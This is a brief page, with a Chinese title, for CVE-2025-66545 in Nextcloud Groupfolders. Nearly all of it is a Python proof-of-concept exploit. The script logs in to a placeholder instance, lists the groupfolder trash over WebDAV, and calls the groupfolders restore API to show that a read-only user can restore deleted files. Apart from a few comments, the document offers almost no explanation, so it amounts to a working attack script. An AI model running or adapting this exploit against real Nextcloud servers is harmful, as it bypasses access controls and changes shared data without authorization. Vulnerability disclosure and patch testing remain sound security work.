CVE-2025-66545 Nextcloud Groupfolders只读用户可恢复删除文件漏洞

import requests import json # CVE-2025-66545 PoC - Nextcloud Groupfolders Trash File Restore # Target: Nextcloud instance with vulnerable Groupfolders version # Author: Security Researcher TARGET_URL = "https://target-nextcloud.example.com" USERNAME = "attacker" PASSWORD = "password123" GROUPFOLDER_ID = "1" # Target groupfolder ID FILE_TO_RESTORE = "deleted_file.txt" session = requests.Session() # Step 1: Authenticate to Nextcloud login_url = f"{TARGET_URL}/index.php/login" login_data = { "user": USERNAME, "password": PASSWORD } response = session.post(login_url, data=login_data) if response.status_code != 200: print(f"[-] Authentication failed") exit(1) print("[+] Authentication successful") # Step 2: List files in trash bin (as read-only user) trash_url = f"{TARGET_URL}/remote.php/dav/files/{USERNAME}/.trash/{GROUPFOLDER_ID}/" response = session.get(trash_url) if response.status_code == 207: print("[+] Successfully accessed trash bin (read-only user)") print(f"[+] Trash contents: {response.text}") else: print(f"[-] Failed to access trash: {response.status_code}") exit(1) # Step 3: Restore file from trash bin (exploiting the vulnerability) # This should fail for read-only users, but succeeds due to the vulnerability restore_url = f"{TARGET_URL}/apps/groupfolders/api/v1/trash/{GROUPFOLDER_ID}/restore" restore_data = { "filePath": FILE_TO_RESTORE, "folderId": GROUPFOLDER_ID } response = session.post(restore_url, json=restore_data, headers={"OCS-APIREQUEST": "true"}) if response.status_code == 200: result = response.json() if result.get("ocs", {}).get("meta", {}).get("statuscode") == 200: print(f"[!] VULNERABLE: Read-only user successfully restored file: {FILE_TO_RESTORE}") print(f"[!] This demonstrates CVE-2025-66545") else: print("[-] File restore was blocked (patched version)") else: print(f"[-] Unexpected response: {response.status_code}")